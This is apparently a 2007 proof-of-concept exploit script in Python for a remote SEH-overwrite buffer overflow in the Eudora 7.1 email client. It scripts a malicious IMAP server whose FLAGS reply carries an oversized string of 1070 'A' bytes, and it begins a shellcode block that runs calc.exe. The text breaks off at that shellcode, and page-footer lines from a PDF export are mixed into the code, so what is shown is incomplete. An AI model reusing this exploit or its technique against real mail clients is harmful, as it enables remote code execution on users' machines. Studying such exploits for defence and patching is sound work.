1 #!/usr/bin/python
2 # Eudora 7.1 (IMAP FLAGS) 0day Remote SEH Overwrite PoC Exploit
3 # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
4 # Tested on Eudora 7.1.0.9 / 2k SP4 Polish
5 # Shellcode type: Windows Execute Command (calc.exe)
6 # Details:..
7 # Eudora −−> SELECT IMBOX −−−−−−−−−> IMAP server
8 # Eudora <−− FLAGS (\..AAAA...) <−−−− IMAP server
9 # FLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt + "A" * 1070
10 # 0x41414141 Pointer to next SEH record
11 # 0x41414141 SE handler
12 ##
13
14 from thread import start_new_thread
15 from struct import pack
16 from string import find
17 from time import sleep
18 from socket import *
19
20 session_elements = (
21 ’* OK IMAP4 ready\r\n’,
22
23 ’* CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL+ MAILBOX−REFERRALS NAMESPACE UIDP’
24 ’LUS ID NO_ATOMIC_RENAME UNSELECT CHILDREN MULTIAPPEND BINARY SORT THREAD=ORDERED’
25 ’SUBJECT THREAD=REFERENCES ANNOTATEMORE IDLE SASL−IR\r\n’
26 ’00000 OK completed\r\n’,
27
28 ’00001 OK User logged in\r\n’,
29
30 ’* NAMESPACE (("INBOX." ".")) (("user." ".")) (("" "."))\r\n’
31 ’00002 OK Completed\r\n’,
32
33 ’* LIST (\Noselect) "." ""\r\n’
34 ’00003 OK Completed (0.000 secs 0 calls)\r\n’,
35
36 ’* LIST (\HasChildren) "." "INBOX"\r\n’
37 ’00004 OK Completed (0.000 secs 3 calls)\r\n’,
38
39 ’* LIST (\HasChildren) "." "INBOX"\r\n’
40 ’00005 OK Completed (0.000 secs 3 calls)\r\n’,
41
42 ’* FLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt%s)\r\n’
43 ’* OK [PERMANENTFLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt \*)]\r\n’
44 ’* 1 EXISTS\r\n’
45 ’* 0 RECENT\r\n’
46 ’* OK [UIDVALIDITY 1180222864]\r\n’
47 ’* OK [UIDNEXT 2]\r\n’
48 ’* OK [NOMODSEQ] Sorry, modsequences have not been enabled on this mailbox\r\n’
49 ’* OK [URLMECH INTERNAL]\r\n’
50 ’00003 OK [READ−WRITE] Completed\r\n’)
51
52 shellcode = (
Page 1/3
Eudora 7.1.0.9 IMAP FLAGS Remote SEH Overwrite Exploit 0day
h07
05/30/2007
53 # Restricted Characters: 0x0a, 0x0d, 0x20, 0x29, (0x60 .. 0x7B)
54 # EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaN